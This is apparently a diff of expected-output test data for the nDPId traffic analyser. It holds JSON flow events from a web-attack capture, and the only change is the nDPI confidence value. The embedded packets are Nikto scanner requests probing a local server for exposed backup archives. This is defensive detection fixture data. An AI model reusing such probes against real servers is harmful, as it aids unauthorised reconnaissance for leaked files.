00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 